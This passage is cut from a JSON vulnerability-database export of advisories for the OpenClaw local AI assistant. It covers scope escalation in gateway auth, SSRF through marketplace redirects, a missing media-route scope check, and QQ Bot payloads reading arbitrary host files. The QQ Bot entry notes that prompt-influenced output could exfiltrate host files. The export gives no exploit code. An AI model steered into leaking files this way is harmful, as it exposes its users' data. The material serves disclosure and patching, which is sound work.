identity-bearing `operator.read` requests into runtime `operator.write`\n## Impact\n\nGateway plugin HTTP `auth: gateway` widens identity-bearing `operator.read` requests into runtime 
`operator.write`.\n\nPlugin HTTP routes using gateway auth could receive runtime write scopes even when the upstream trusted-proxy request only declared read.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `2026.1.29`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42429","reference_id":"","reference_type":"","scores":[{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20475","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20424","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20463","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42429"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4f8g-77mw-3rxc","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"LOW","scoring_system"
:"cvssv3.1_qr","scoring_elements":""},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:09:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4f8g-77mw-3rxc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42429","reference_id":"CVE-2026-42429","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42429"},{"reference_url":"https://github.com/advisories/GHSA-4f8g-77mw-3rxc","reference_id":"GHSA-4f8g-77mw-3rxc","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4f8g-77mw-3rxc"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication","reference_id":"openclaw-privilege-escalation-via-gateway-plugin-http-authentication","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:09:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vul
nerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vul
nerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42429","GHSA-4f8g-77mw-3rxc"],"risk_score":3.2,"exploitability":"0.5","weighted_severity":"6.4","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p7gx-9usz-yyew"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89521?format=json","vulnerability_id":"VCID-p7me-4bzz-83cm","summary":"OpenClaw: Marketplace Plugin Download Follows Redirects Without SSRF Protection\n## Summary\nMarketplace Plugin Download Follows Redirects Without SSRF Protection\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: v2026.3.28 still uses bare redirect-following fetch in src/plugins/marketplace.ts for marketplace archives, and fixed-on-main only does not change that shipped SSRF exposure.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `2ce44ca6a1302b166a128abbd78f72114f2f4f52` — 2026-03-31T12:59:42+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @AntAISecurityLab for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41297","reference_id":"","reference_type":"","scores":[{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13336","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13378","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13373","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41297"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2ce44ca6a1302b166a128abbd78f72114f2f4f52","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:41:27Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2ce44ca6a1302b166a128abbd78f72114f2f4f52"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vjx8-8p7h-82gr","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvss
v3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:41:27Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vjx8-8p7h-82gr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41297","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41297"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-marketplace-plugin-download-redirect","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:41:27Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-
via-marketplace-plugin-download-redirect"},{"reference_url":"https://github.com/advisories/GHSA-vjx8-8p7h-82gr","reference_id":"GHSA-vjx8-8p7h-82gr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vjx8-8p7h-82gr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25
p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65
g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41297","GHSA-vjx8-8p7h-82gr"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p7me-4bzz-83cm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89847?format=json","vulnerability_id":"VCID-p7v5-jqhq-nbhz","summary":"OpenClaw: QQ Bot structured payloads could read arbitrary local files\n## Summary\n\nBefore OpenClaw 2026.4.2, QQ Bot structured media payloads could read local files from attacker-chosen paths. A crafted structured payload could escape QQ Bot-owned media roots and cause arbitrary file reads on the host.\n\n## Impact\n\nPrompt-influenced structured payload output could exfiltrate any host file readable by the OpenClaw process through the QQ Bot media-send path. This was a real confidentiality bug on the host filesystem boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `2c45b06afdd6f7c621038b5419d8e661cff34a7f` — restrict QQ Bot structured payload local paths\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. 
Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2c45b06afdd6f7c621038b5419d8e661cff34a7f","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/2c45b06afdd6f7c621038b5419d8e661cff34a7f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-846p-hgpv-vphc","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-846p-hgpv-vphc"},{"reference_url":"https://github.com/advisories/GHSA-846p-hgpv-vphc","reference_id":"GHSA-846p-hgpv-vphc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-846p-hgpv-vphc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerab
ility":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerab
ility":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["GHSA-846p-hgpv-vphc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p7v5-jqhq-nbhz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89625?format=json","vulnerability_id":"VCID-p8xd-2um4-9ufr","summary":"OpenClaw: Assistant media route missed scope enforcement for trusted-proxy authorization\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nThe Control UI assistant-media route authenticated trusted-proxy callers but did not enforce the declared operator scopes for identity-bearing HTTP auth paths. 
A trusted-proxy caller without `operator.read` could access assistant-media files and metadata that were otherwise inside allowed media roots.\n\nThe route still required successful gateway authentication and media-root checks. Severity is low.\n\n## Fix\n\nAssistant-media file and metadata requests now require `operator.read` on identity-bearing HTTP auth paths.\n\nFix commit:\n\n- `99ef3a63c58440d53f8e45ad861b846032fcb036`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41908","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11147","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11181","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11188","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41908"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/99ef3a63c58440d53f8e45ad861b846032fcb036","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{